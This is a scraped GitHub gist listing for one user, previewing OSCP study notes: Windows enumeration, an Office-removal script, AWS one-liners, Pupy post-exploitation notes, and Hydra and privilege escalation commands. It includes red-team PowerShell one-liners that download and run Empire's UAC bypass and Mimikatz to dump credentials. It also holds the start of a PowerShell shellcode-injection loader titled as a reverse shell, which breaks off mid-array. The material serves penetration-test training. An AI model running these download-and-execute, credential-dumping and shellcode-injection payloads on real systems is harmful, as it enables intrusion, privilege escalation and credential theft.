
Steve Stonebraker ssstonebraker

View OSCP_Windows_Enumeration.md

[TOC]

Windows Initial Checks

Basic Info

hostname
systeminfo
whoami

Global path

If any directory in the SYSTEM %PATH% variable is writable by Authenticated Users, a privilege escalation path exists.

@ssstonebraker
ssstonebraker / remove_office_365_mac.sh
Created Jun 12, 2020
Office 365 Mac 2020 - Delete everything
View remove_office_365_mac.sh
#!/bin/bash
echo " Removing Office 365 apps..."
rm -rf "/Applications/Microsoft Excel.app"
rm -rf "/Applications/Microsoft OneNote.app"
rm -rf "/Applications/Microsoft Outlook.app"
rm -rf "/Applications/Microsoft PowerPoint.app"
rm -rf "/Applications/Microsoft Word.app"
rm -rf "/Applications/Microsoft OneDrive.app"
rm -rf "/Applications/Microsoft Teams.app"
View aws_scripts.md

List accounts in org

aws organizations list-accounts | grep arn | awk -F'/' '{ print $3 }' | awk -F'"' '{ print $1 }'
View Pentest-Service-Enumeration-Screenshots.md

Basic Usage

To view basic usage just type:

pse


Listing commands for a service

pse <service-name>
View OSCP_Post_Exploitation.md

Pupy Post Exploitation Toolkit Notes

link to project home: https://github.com/n1nj4sec/pupy

Create aliases - modify pupy.conf

In pupy.conf, add the aliases under the section that starts with [aliases]:

[aliases]
View OSCP_Redteam_Powershell_Cheatsheet.md

Description:

Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start     powershell.exe'"

Invoke-Mimikatz: Dump credentials from memory

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

Import Mimikatz Module to run further commands

View OSCP_Password_Cracking.md

Hydra

Supported protocols

| List1 | list2 | list3 | list4 | list5 |
|---|---|---|---|---|
| asterisk | icq | oracle-listener | rexec | snmp |
| cisco | imap[s] | oracle-sid | rlogin | socks5 |
| cisco-enable | irc | pcanywhere | rpcap | ssh |
View OSCP_Privilege_Escalation.md

Grep for files on disk

grep --binary-files=text -B 2 '99999:7' /dev/sda1
find / -maxdepth 2 -path '/proc' -prune -o -path '/dev' -prune -o -type f -exec grep "proof.txt" {} +

Docker Privilege Escalation

@ssstonebraker
ssstonebraker / OSCP_Windows_Powershell_Reverse_Shell.ps1
Last active Jul 6, 2020
oscp windows powershell reverse shell
View OSCP_Windows_Powershell_Reverse_Shell.ps1
$code = '
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';
$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;
[Byte[]];
[Byte[]] $sc = 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52,0x14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd,0x1,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1,0x51,0x8b,0x59,0x20,0x1,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xff,0xac,0xc1,0xcf,0xd,0x1,0xc7,0x38,0xe0,0x75,0xf6,0x3,0x7d,0xf8,0x3b,0x7d,